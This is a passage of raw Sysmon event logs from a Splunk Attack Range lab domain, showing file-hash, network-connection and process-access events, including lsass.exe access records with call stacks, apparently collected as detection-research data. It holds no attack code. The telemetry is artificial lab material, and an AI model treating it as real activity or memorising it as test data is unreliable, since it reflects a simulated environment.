Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F16225B085D2F06F48A74243A37EF634,SHA256=C86AB8268077DA689BBD744DFF751268BE23F7F308CA4C17E42A1C1E30B34253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:13.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C51EC936927DA101D7D7FB34BAC6DCEA,SHA256=1E6A711F3BB126D973A86A6EFE61284CFE628BEDC8728E1DDC9D7AD00A86A7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:14.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B042CCFC51563C5084DF64E3C6F17B,SHA256=C3AA00E5F228F1F006480560F7FB48F3B273EDCF9FEE8F1E074B9E035A33AC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:14.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C059995D22A32AE61873DDBF46BDF7C,SHA256=114E7DA54EEE21C032E197B30457DAFE99C5FF8C34F586AFB840B765D2D1C1DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.582{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1FCF14E4F14A686DFE9A99E844F501,SHA256=1036374EDB94E73AA29000DE731E1A0829C004D8E514340EB1D04E086BA9C5DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:13.376{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57276-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:15.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9742C22682F68A742693D09261E4CFF8,SHA256=B61903F5F10C55EC71589CDF3186F239F839EC5618262AB049C7E0BEC8A07629,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D6A8596644251D852CF14C08D32EE44,SHA256=0F7AAFF03CE7FFB808DC06BA4287590DAEF48BA6EC81D1031469D1BFCE0673D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A55AE63016C07F97D3CCF7789293058,SHA256=193635A11357A8C4C6D500CAE03A07ED866E7A020761A37C029CEB56EF8ED7F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.609{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51037-false10.0.1.12-8000- 23542300x80000000000000001049212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:16.596{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDA4024A8CC2CDC11470FE6BF7D1C3E,SHA256=3A11E9174EA35454452032031D658F9B882CF129E44A07898B258921B29C617A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:16.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29DDA18C2F17374DB9E61907002073E7,SHA256=CB16D6F921C91D16FDBDC632B7843A60AA346392067E21A2EB051A01ED764A8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.940{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51038-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001049210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.940{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51038-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E921234677B48FFF6322965F6F8F522,SHA256=8F1D945BFEB066AC11C16A017C962834D39B7FD237F3FAE6B5F41AFC09B61666,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D76FB3DBADC00E25088C500A5A9DF068,SHA256=0C4868C2C30D1DD4405385D301DB74D795BED4AD2CAC25C587C50FD7AE86637F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:15.855{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-29373-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359F9D555FE7E3AE32B24564F9CC7E48,SHA256=FBA59D44256AB0B39C389EA7999D9A2EB203FFF41BC204958C7868BB71E9AD02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.848{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 